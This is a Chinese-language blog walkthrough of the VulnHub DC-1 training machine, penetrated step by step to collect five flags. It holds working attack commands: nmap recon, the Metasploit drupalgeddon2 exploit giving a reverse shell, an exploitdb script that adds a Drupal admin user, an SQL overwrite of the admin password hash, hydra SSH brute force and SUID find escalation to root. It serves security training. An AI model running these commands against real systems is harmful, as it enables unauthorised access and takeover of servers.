DC-1靶机渗透

名称DC- 1
发布日期2019年2月28日
作者DCAU
资源地址:https://www.vulnhub.com/entry/dc-1,292/
任务:拿下五个flag并取得靶机root权限

使用工具
攻击者: kali 192.168.176.142 NAT
靶机:dc-1 192.168.176.149 NAT
注:靶机实验不建议使用校园内网。

一:信息收集

基础信息查询

#### 0x01 查看存活主机

arp-scan -l 二层主机扫描,主动发送ARP包进行嗅探,可以通过靶机MAC地址确定其IP为149
image

#### 0x02 查看开放端口

nmap -sV 192.168.176.149
image
查询发现,目标靶机开放ssh服务&HTTP服务

0x03 访问80端口

查看基本信息,可以使用Firefox插件Wappalyzer(谷歌应用市场也有),或者扫描网站目录查看robots.txt等暴露出的信息,可以获取到网站的CMS版本Drupal7
image

二:查找漏洞

msf漏洞查询

0x01 启动msf

msfdb init初始化msf数据库
msfconsole
search Drupal 7
image
使用最新漏洞
exploit/unix/webapp/drupal_drupalgeddon2
set lhost 192.168.176.142
set Rhosts 192.168.176.149
show options
run
image
shell
python -c 'import pty;pty.spawn("/bin/bash")'开启终端
image

0x02 flag1

可以在/var/www 目录下查找到flag1
image
flag提示我们查看config配置文件,
百度可知道Drupal的配置文件(settings.php)在sites/default/files 中
cd sites/default
cat settings.php

0x03 flag2

image
得到flag2以及MySQL数据库账户及密码,尝试登录查找信息

0x04 查询数据库信息

mysql -u dbuser -p R0ck3t
登录成功,查询账号密码
show databases;
use drupaldb
show tables;
select* from users;
image
查询到账户密码,这里的密码被加密,尝试解密但失败。

三:漏洞利用

0x01 破解密码加密

法一:
在exploitdb中有一个针对Drupal 7版本的攻击脚本,可以增加一个admin权限的用户账号,使用此方法简便了破解admin的密码,更为直接。
image
根据自诉文件使用脚本:
python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.176.149 -u admin0 -p admin0
查看数据库信息:
image
新用户 admin0创建成功,可以进行登陆
方法二:
drupal可以利用Drupal对数据库的加密方法,加密脚本位置在网站根目录下的scripts下
find -name password_hash* 查找到文件的存在位置
使用加密脚本加密123456,生成加密密文,将所得密文替换MySQL数据库中的原有密文,实现密码更新
image
update users set pass='$S$Dg2EK4adJMec5G.Qupq33xzfWHVXP/WKbRqtwUZYPoal7RGUM2P1' where uid=1;
image
admin更新密码123456成功,可登录。

0x02 flag3

登录查看flag3,提示到 find提权,-exec shadow文件 passwd文件
image
查看passwd文件,发现flag4是一个用户
image

0x03 爆破flag4用户密码

使用hydra破解
cd /usr/share/worldlists
gzip -d rockyou.tar 解压kali自带密码字典
hydra -l flag4 -P /usr/share/wordlists/rockyou.txt ssh://192.168.176.149
破解出flag4密码orange
image

0x04 ssh远程连接

ssh flag4@192.168.176.149
image

0x05 flag4

其实完全不需要ssh远程连接即可查看到flag4,他是一个用户,则cd/home/flag4 查看其中有无flag文件,查找到flag4.txt)
image

四:提权

根据flag3中提示可以find提权使用find命令查找有特殊权限suid【让普通用户可以以root用户的角色执行程序或命令的命令,】
find / -perm 4000匹配权限suid,发现find具有su权限,尝试使用find提权
find / -name flag4 -exec "/bin/sh" ;
image
提权成功,找到flag5,渗透结束

总结
此次实验,考察ssh爆破,drupal文件配置路径信息,find提权用法等知识点,难点在于对提权方法不够了解,仍需多多练习。

posted @ 2022-03-31 14:28  胡阿斐  阅读(101)  评论(0编辑  收藏  举报